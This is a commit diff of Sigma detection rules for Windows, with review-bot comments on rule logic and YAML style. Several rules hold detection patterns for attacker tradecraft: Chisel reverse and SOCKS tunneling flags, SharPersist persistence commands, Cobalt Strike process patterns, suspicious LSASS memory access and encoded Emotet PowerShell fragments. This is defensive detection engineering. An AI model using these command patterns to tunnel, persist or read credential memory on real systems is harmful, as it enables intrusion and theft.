+++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/08/09 +modified: 2022/09/20 logsource: category: process_access product: windows @@ -32,6 +32,26 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive7: # VsCode + TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + falsepositive8: # Google Chrome + TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + falsepositive9: # Google Chrome Update + TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + falsepositive10: # MS Teams + TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + falsepositives11: + TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe' + SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe' + falsepositives12: + TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider + Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* falsepositives: - Unknown 
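Review bot: `falsepositive_kerneltrace_edge` keys solely on `Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls'`, so every event from that provider is excluded regardless of source or target image, which switches the rule off for that data source entirely rather than for the `UNKNOWN(...)` CallTrace edge case the comment describes; if CallTrace really takes that form there, pairing the provider with `CallTrace|startswith: 'UNKNOWN('` scopes the exclusion as intended. The new entries also mix `falsepositive7`…`falsepositive10` with `falsepositives11`/`falsepositives12`; `1 of falsepositive*` still covers all of them, but the plural names should be `falsepositive11`/`falsepositive12` for consistency. `falsepositive8` and `falsepositive9` apply `|endswith` to a drive-rooted full path, which is an exact match in disguise; drop the modifier as `falsepositives11` does, or drop the drive prefix as `falsepositive7` does.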
diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 51c980f05..e9f723900 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/08/13 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -38,8 +38,8 @@ detection: - 'C:\Windows\System32\lsass.exe' - 'C:\WINDOWS\System32\perfmon.exe' - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' - - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' + - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' + - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' # Windows Defender filter2: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\' @@ -92,6 +92,10 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' + filter_xampp: + SourceImage|endswith: '\xampp-control.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index e984d6e97..726d944dc 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml 
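Review bot: `filter_xampp` matches on the bare suffix `'\xampp-control.exe'`, the weakest form of path exclusion, whereas the JetBrains entry added in the same hunk carries its vendor directory; anchoring on the install folder, presumably `'\xampp\xampp-control.exe'` given the `C:\xampp\` path used elsewhere in this commit, keeps the filter from covering an identically named binary in another location. The list that receives the JetBrains line begins before the hunk, so the field and access mask it is paired with are not visible here. A one-line comment on what xampp-control does with LSASS at `0x410` would make the exclusion easier to revisit.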
@@ -4,7 +4,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder author: Florian Roth date: 2021/11/27 -modified: 2022/07/07 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -65,6 +65,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebexMTA.exe' - '\WebEx\WebexHost.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' GrantedAccess: '0x410' filter2: SourceImage|startswith: 'C:\Windows\Temp\' @@ -84,9 +85,9 @@ detection: - '\vs_bootstrapper_' GrantedAccess: '0x1410' filter_chrome: - SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' - SourceImage|endswith: '.tmp\GoogleUpdate.exe' - GrantedAccess: '0x410' + SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' + SourceImage|endswith: '.tmp\GoogleUpdate.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index 171a30883..d9d77b85b 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -4,6 +4,7 @@ status: experimental description: Detects shellcode injection by Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.privilege_escalation 
@@ -13,11 +14,38 @@ logsource: product: windows detection: selection: - GrantedAccess: + GrantedAccess: - '0x147a' - '0x1f3fff' CallTrace|contains: 'UNKNOWN' - condition: selection + filter_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF + SourceImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + TargetImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + filter_dell_specifc: + SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe + TargetImage: C:\Windows\Explorer.EXE + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3282e8630..1a9204e31 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml 
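Review bot: `GrantedAccess: 0x1F3FFF` in both new filters is unquoted, so a YAML 1.1 loader reads it as the integer 2047999 rather than the string `0x1F3FFF`, while the `selection` block quotes its values (`'0x1f3fff'`); quote the filters too, `GrantedAccess: '0x1F3FFF'`, or the exclusion may never match depending on the backend. `filter_dell_specifc` is misspelled; `filter_dell_specific` still satisfies `1 of filter_*` and reads correctly. The `SourceImage`/`TargetImage` values in that filter are unquoted plain scalars, which is valid YAML but inconsistent with the quoted paths in `filter_dell_folders`. The worked examples in the comment block are a good pattern; consider keeping them to the two source/target pairs actually covered to avoid the block drifting from the conditions below it.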
@@ -13,6 +13,7 @@ tags: - attack.s0190 - attack.t1036.003 date: 2022/06/28 +modified: 2022/09/13 author: Florian Roth logsource: category: process_creation @@ -28,6 +29,7 @@ detection: CommandLine|contains: - 'C:\Windows\Temp\' - '%temp%' + - '%tmp%' - 'C:\ProgramData\' - '%ProgramData%' - '\AppData\Local\' diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml new file mode 100644 index 000000000..0ed05a1e0 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml @@ -0,0 +1,37 @@ +title: Chisel Tunneling Tool Usage +id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 +related: + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar +status: experimental +description: Detects usage of the Chisel tunneling tool via the commandline arguments +author: Florian Roth +references: + - https://github.com/jpillora/chisel/ + - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ +date: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + Image|endswith: '\chisel.exe' + selection_param1: + CommandLine|contains: + - 'exe client ' + - 'exe server ' + selection_param2: + CommandLine|contains: + - ' --socks5' + - ' --reverse' + - ' r:' + - ':127.0.0.1:' + - ' --tls-skip-verify ' + - ':socks' + condition: selection_img or all of selection_param* +falsepositives: + - Some false positives may occure with other tools with similar commandlines +level: high diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 734fa9286..14fc79e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml 
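Review bot: `' --tls-skip-verify '` is the only `selection_param2` entry with a trailing space, so that flag is missed when it closes the command line; drop the trailing space to match the other entries. The generic tokens `' r:'` and `':127.0.0.1:'` combined with `'exe client '`/`'exe server '` will also fire on other client/server tools that forward ports, which the `falsepositives` entry acknowledges; `occure` there should read `occur`. The condition `selection_img or all of selection_param*` is sound, but a short comment stating that `selection_param1` and `selection_param2` are meant to catch a renamed binary would explain why both branches exist.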
@@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ date: 2022/07/12 +modified: 2022/09/14 logsource: category: process_creation product: windows @@ -19,6 +20,7 @@ detection: - ' > \Users\Public\' - ' > C:\Users\Public\' - ' > %TEMP%\' + - ' > %TMP%\' condition: selection falsepositives: - Legitimate admin scripts diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index 36718bfa0..7f43b42ec 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml @@ -12,7 +12,7 @@ tags: - car.2019-04-001 author: Nik Seetharaman, Christian Burkard date: 2019/07/31 -modified: 2021/08/31 +modified: 2022/09/21 references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - https://twitter.com/hFireF0X/status/897640081053364225 @@ -25,8 +25,8 @@ detection: selection: ParentImage|endswith: '\DllHost.exe' IntegrityLevel: - - 'High' - - 'System' + - 'High' + - 'System' ParentCommandLine|contains: - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml index fa318be5f..59d50cbdb 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml 
@@ -3,7 +3,7 @@ status: test id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 author: Wojciech Lesicki date: 2021/06/01 -modified: 2022/03/04 +modified: 2022/09/16 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable @@ -16,14 +16,18 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_rundll: + - Image|endswith: '\rundll32.exe' + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: - 'rundll32.exe' - - '.dll' + - 'rundll32 ' + selection_params: + CommandLine|contains: '.dll' CommandLine|endswith: - ' StartW' - ',StartW' - condition: selection + condition: all of selection* falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index 851989769..f4328767e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml 
@@ -7,34 +7,39 @@ references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 -modified: 2022/03/05 +modified: 2022/09/20 tags: - attack.execution - - attack.t1059 + - attack.t1059 logsource: category: process_creation product: windows detection: - selection1: + selection1: CommandLine|contains: '\cmd.exe /C whoami' ParentImage|startswith: 'C:\Temp' selection2: - CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' - ParentCommandLine|contains: - - '/C whoami' - - 'cmd.exe /C echo' - - ' > \\\\.\\pipe' - selection3: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c echo' - '> \\\\.\\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' - selection4: + selection3: Image|endswith: '\cmd.exe' ParentImage|endswith: '\runonce.exe' ParentCommandLine|endswith: '\runonce.exe' - condition: 1 of selection* + selection_special1: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\\\.\\pipe' + filter_special1: + # Internet Download Manager - Chrome Extension + ParentCommandLine|contains: + - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe' + - 'chrome-extension://' + condition: 1 of selection* and (selection_special1 and not filter_special1) falsepositives: - Other programs that cause these patterns (please report) level: high diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 0c13c80cc..d5c4a6811 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml 
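Review bot: The new `condition: 1 of selection* and (selection_special1 and not filter_special1)` requires every event to satisfy `selection_special1`, because `and` joins both halves, and the `selection*` glob already includes `selection_special1` itself; the net effect is that `selection1`–`selection3` alone no longer fire, which the hunk clearly does not intend since it keeps them. Use `condition: (selection1 or selection2 or selection3) or (selection_special1 and not filter_special1)` so the glob no longer swallows the special selection. The comment `# Internet Download Manager - Chrome Extension` on `filter_special1` is the kind of note the other filters in this commit should also carry.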
@@ -3,7 +3,7 @@ status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -modified: 2022/02/02 +modified: 2022/09/20 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 @@ -24,8 +24,11 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + CommandLine|contains: + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive + - Citrix level: high diff --git a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml index 2cdf79b9f..805d9eeae 100644 --- a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml 
@@ -1,23 +1,24 @@ title: Discovery/Execution via dnscmd.exe id: b6457d63-d2a2-4e29-859d-4e7affc153d1 -description: | +description: | Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service. Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain references: - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records - - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd + - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records + - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ status: experimental author: '@gott_cyber' date: 2022/07/31 +modified: 2022/09/14 tags: - - attack.discovery - - attack.execution - - attack.t1543.003 + - attack.discovery + - attack.execution + - attack.t1543.003 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: dnscmd: Image|endswith: '\dnscmd.exe' @@ -25,6 +26,7 @@ detection: CommandLine|contains: - '/enumrecords' - '/enumzones' + - '/ZonePrint' - '/info' selection_2: CommandLine|contains|all: diff --git a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml index 1202cc9f2..7bc952889 100644 --- a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml 
@@ -25,7 +25,11 @@ detection: - 'C:\Public\' - '\AppData\Local\Temp\' - '\AppData\Roaming\Temp\' - condition: selection + filter_dell: + # Launched by Dell ServiceShell.exe + ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe' + CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\' + condition: selection and not 1 of filter_* fields: - ComputerName - User diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml new file mode 100644 index 000000000..51ca980d6 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -0,0 +1,40 @@ +title: SharPersist Usage +id: 26488ad0-f9fd-4536-876f-52fea846a2e4 +status: experimental +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +author: Florian Roth +references: + - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit + - https://github.com/mandiant/SharPersist +date: 2022/09/15 +logsource: + category: process_creation + product: windows +tags: + - attack.persistence + - attack.t1053 +detection: + selection1: + Image|endswith: '\SharPersist.exe' + selection2: + Product: 'SharPersist' + selection3: + CommandLine|contains: + - ' -t schtask -c ' + - ' -t startupfolder -c ' + selection4: + CommandLine|contains|all: + - ' -t reg -c ' + - ' -m add' + selection5: + CommandLine|contains|all: + - ' -t service -c ' + - ' -m add' + selection6: + CommandLine|contains|all: + - ' -t schtask -c ' + - ' -m add' + condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml index c0ba595f8..64e40c05f 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml 
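Review bot: `selection6` is fully subsumed by `selection3`: any command line containing `' -t schtask -c '` already satisfies `selection3`, so the additional `' -m add'` requirement in `selection6` never changes the outcome. Either delete `selection6`, or remove the schtask entry from `selection3` if the intent was to require `-m add` for schtask as it is for the `reg` and `service` modes. The `tags` list stops at `attack.t1053`, although the `reg`, `service` and `startupfolder` modes correspond to other persistence sub-techniques; consider tagging those as well.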
+++ b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml @@ -4,7 +4,7 @@ status: stable description: Detects all Emotet like process executions that are not covered by the more generic rules author: Florian Roth date: 2019/09/30 -modified: 2021/11/29 +modified: 2022/09/27 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,12 @@ detection: - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA' # =$env:temp+( - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA' # =$env:temp+( - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA' # =$env:temp+( - condition: selection + filter: + CommandLine|contains: + - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ' + - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA' + - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA' + condition: selection and not filter fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index e7200ba8f..0fb8cc3ec 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/06/12 +modified: 2022/09/21 logsource: category: process_creation product: windows 
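Review bot: The three base64 strings in the new `filter` carry no decoded comment, unlike the `selection` entries beside them that are annotated `# =$env:temp+(`; they are the three UTF-16LE alignments of `| ConvertTo-Json -ErrorAction SilentlyContinue`, so annotate each with `# | ConvertTo-Json -ErrorAction SilentlyContinue` and add one line naming the software whose encoded command motivated the exclusion. The filter also has the generic name `filter`; a descriptive name such as `filter_convertto_json` matches the convention used elsewhere in this commit. The rest of `detection` and the `fields` list continue outside the hunk.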
@@ -25,9 +25,14 @@ detection: - ' /g' - ' /u' - ' /p' - condition: all of selection_mstsc* or all of selection_cmdkey* + filter_mstsc_1: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp + ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' + condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - - Unknown + - WSL (Windows Sub System For Linux) + - Other currently unknown software level: medium tags: - attack.lateral_movement diff --git a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml index f20dced4e..d608a60d4 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml 
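Review bot: `condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey*` relies on `and` binding tighter than `or`; that is how Sigma evaluates it, but the intent is clearer and safer against later edits as `condition: (all of selection_mstsc* and not 1 of filter_mstsc_*) or all of selection_cmdkey*`. In `falsepositives`, `WSL (Windows Sub System For Linux)` should read `WSL (Windows Subsystem for Linux)`. The `# Example:` comment on `filter_mstsc_1` showing the real wslhost invocation is a helpful pattern worth keeping.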
@@ -7,51 +7,52 @@ references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 date: 2020/05/25 -modified: 2022/01/07 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'firewall' - - 'add' - - 'allowedprogram' - selection2: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'advfirewall' - - 'firewall' - - 'add' - - 'rule' - - 'action=allow' - - 'program=' - susp_image: - - CommandLine|contains: - - '%TEMP%' - - ':\RECYCLER\' - - 'C:\$Recycle.bin\' - - ':\SystemVolumeInformation\' - - 'C:\Windows\Temp\' - - 'C:\Temp\' - - 'C:\Users\Public\' - - 'C:\Users\Default\' - - 'C:\Users\Desktop\' - - '\Downloads\' - - '\Temporary Internet Files\Content.Outlook\' - - '\Local Settings\Temporary Internet Files\' - - CommandLine|startswith: - - 'C:\Windows\Tasks\' - - 'C:\Windows\debug\' - - 'C:\Windows\fonts\' - - 'C:\Windows\help\' - - 'C:\Windows\drivers\' - - 'C:\Windows\addins\' - - 'C:\Windows\cursors\' - - 'C:\Windows\system32\tasks\' - - '%Public%\' - condition: (selection1 or selection2) and susp_image + selection1: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'firewall' + - 'add' + - 'allowedprogram' + selection2: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'advfirewall' + - 'firewall' + - 'add' + - 'rule' + - 'action=allow' + - 'program=' + susp_image: + - CommandLine|contains: + - '%TEMP%' + - '%TMP%' + - ':\RECYCLER\' + - 'C:\$Recycle.bin\' + - ':\SystemVolumeInformation\' + - 'C:\Windows\Temp\' + - 'C:\Temp\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - 'C:\Users\Desktop\' + - '\Downloads\' + - '\Temporary Internet Files\Content.Outlook\' + - '\Local Settings\Temporary Internet Files\' + - CommandLine|startswith: + - 'C:\Windows\Tasks\' + - 'C:\Windows\debug\' + - 
'C:\Windows\fonts\' + - 'C:\Windows\help\' + - 'C:\Windows\drivers\' + - 'C:\Windows\addins\' + - 'C:\Windows\cursors\' + - 'C:\Windows\system32\tasks\' + - '%Public%\' + condition: (1 of selection*) and susp_image falsepositives: - Legitimate administration level: high diff --git a/rules/windows/process_creation/proc_creation_win_netsupport.yml b/rules/windows/process_creation/proc_creation_win_netsupport.yml new file mode 100644 index 000000000..d9d99094f --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_netsupport.yml @@ -0,0 +1,27 @@ +title: Use of NetSupport Remote Access Software +id: 758ff488-18d5-4cbe-8ec4-02b6285a434f +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Description: NetSupport Client Configurator + - Product: NetSupport Remote Control + - Company: NetSupport Ltd + - OriginalFileName: PCICFGUI.EXE + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 
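Review bot: The `CommandLine|startswith` branch of `susp_image` can never match: `selection1`/`selection2` require a netsh command line, which begins with the netsh executable token, not with `C:\Windows\Tasks\` or any of the other listed folders, so those nine entries are dead and belong in the `CommandLine|contains` list above them, where the `program=` value would actually carry such a path. `'C:\Users\Desktop\'` in the contains list is not a path that exists on a stock system (desktops live under the per-user profile folder); `'\Desktop\'` is presumably what was meant. The condition rewrite to `(1 of selection*) and susp_image` is equivalent to the previous form.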
